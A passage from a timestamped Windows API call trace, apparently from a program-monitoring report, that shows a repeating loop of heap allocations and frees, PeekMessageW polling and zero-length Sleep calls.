| out: hHeap=0xc60000) returned 1 [0254.964] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.965] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.965] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.965] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.965] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.965] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78dc8 [0254.965] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4ca0 [0254.965] Sleep (dwMilliseconds=0x0) [0254.965] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78dc8 | out: hHeap=0xc60000) returned 1 [0254.965] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4ca0 | out: hHeap=0xc60000) returned 1 [0254.965] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.965] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.965] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.965] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.965] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.965] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.965] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.965] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.965] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.965] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.965] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xed57f8 [0254.965] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.965] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed57f8 | out: hHeap=0xc60000) returned 1 [0254.965] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.965] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.966] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.966] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.966] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.966] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78dc8 [0254.966] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4ca0 [0254.966] Sleep (dwMilliseconds=0x0) [0254.966] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78dc8 | out: hHeap=0xc60000) returned 1 [0254.966] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4ca0 | out: hHeap=0xc60000) returned 1 [0254.966] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.966] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.966] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.966] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.966] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.966] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.966] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.966] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.966] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.966] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.966] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xed57f8 [0254.966] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.966] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed57f8 | out: hHeap=0xc60000) returned 1 [0254.966] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.966] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.967] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.967] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.967] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.967] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78dc8 [0254.967] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4ca0 [0254.967] Sleep (dwMilliseconds=0x0) [0254.967] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78dc8 | out: hHeap=0xc60000) returned 1 [0254.967] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4ca0 | out: hHeap=0xc60000) returned 1 [0254.967] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.967] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.967] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.967] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.967] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.967] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.967] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.967] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.967] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.967] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.967] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xed57f8 [0254.967] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.967] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed57f8 | out: hHeap=0xc60000) returned 1 [0254.967] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.967] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.968] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.968] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.968] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.968] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78dc8 [0254.968] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4ca0 [0254.968] Sleep (dwMilliseconds=0x0) [0254.968] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78dc8 | out: hHeap=0xc60000) returned 1 [0254.968] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4ca0 | out: hHeap=0xc60000) returned 1 [0254.968] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.968] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.968] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.968] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.968] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.968] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.968] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.968] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.968] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.968] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.968] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xed57f8 [0254.968] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.968] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed57f8 | out: hHeap=0xc60000) returned 1 [0254.968] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.969] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.969] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.969] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.969] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.969] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78dc8 [0254.969] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4ca0 [0254.969] Sleep (dwMilliseconds=0x0) [0254.969] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78dc8 | out: hHeap=0xc60000) returned 1 [0254.969] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4ca0 | out: hHeap=0xc60000) returned 1 [0254.969] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.969] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.969] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.969] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.969] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.969] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.969] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.969] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.969] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.969] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.969] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xed57f8 [0254.969] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.969] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed57f8 | out: hHeap=0xc60000) returned 1 [0254.969] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.969] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.970] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.970] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.970] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.970] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78dc8 [0254.970] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4ca0 [0254.970] Sleep (dwMilliseconds=0x0) [0254.970] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78dc8 | out: hHeap=0xc60000) returned 1 [0254.970] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4ca0 | out: hHeap=0xc60000) returned 1 [0254.970] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.970] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.970] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.970] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.970] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.970] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.970] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.970] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.970] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.970] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.972] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xed57f8 [0254.972] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.972] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed57f8 | out: hHeap=0xc60000) returned 1 [0254.972] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.972] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.972] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.972] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.972] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.972] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78dc8 [0254.972] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4ca0 [0254.972] Sleep (dwMilliseconds=0x0) [0254.972] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78dc8 | out: hHeap=0xc60000) returned 1 [0254.972] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4ca0 | out: hHeap=0xc60000) returned 1 [0254.972] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.972] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.972] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.972] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.973] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.973] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.973] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.973] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.973] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.973] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.973] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xed57f8 [0254.973] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.973] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed57f8 | out: hHeap=0xc60000) returned 1 [0254.973] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.973] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.973] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.973] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.973] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.973] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78dc8 [0254.973] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4ca0 [0254.973] Sleep (dwMilliseconds=0x0) [0254.973] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78dc8 | out: hHeap=0xc60000) returned 1 [0254.973] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4ca0 | out: hHeap=0xc60000) returned 1 [0254.973] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.973] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.973] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.973] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.973] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.974] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.974] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.974] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.974] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.974] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.974] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xed57f8 [0254.974] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.974] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed57f8 | out: hHeap=0xc60000) returned 1 [0254.974] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.974] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.974] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.974] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.974] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.974] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78dc8 [0254.974] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4ca0 [0254.974] Sleep (dwMilliseconds=0x0) [0254.974] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78dc8 | out: hHeap=0xc60000) returned 1 [0254.974] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4ca0 | out: hHeap=0xc60000) returned 1 [0254.974] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.974] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.974] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.975] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.975] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.975] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.975] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.975] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.975] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.975] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.975] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xed57f8 [0254.975] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.975] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed57f8 | out: hHeap=0xc60000) returned 1 [0254.975] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.975] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.975] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.975] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.975] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.975] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78dc8 [0254.975] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4ca0 [0254.975] Sleep (dwMilliseconds=0x0) [0254.975] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78dc8 | out: hHeap=0xc60000) returned 1 [0254.975] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4ca0 | out: hHeap=0xc60000) returned 1 [0254.975] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.975] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0254.975] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.976] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.976] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.976] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.976] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4dc0 [0254.976] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4dc0 | out: hHeap=0xc60000) returned 1 [0254.976] RtlAllocateHeap (HeapHandle=0xc60000, 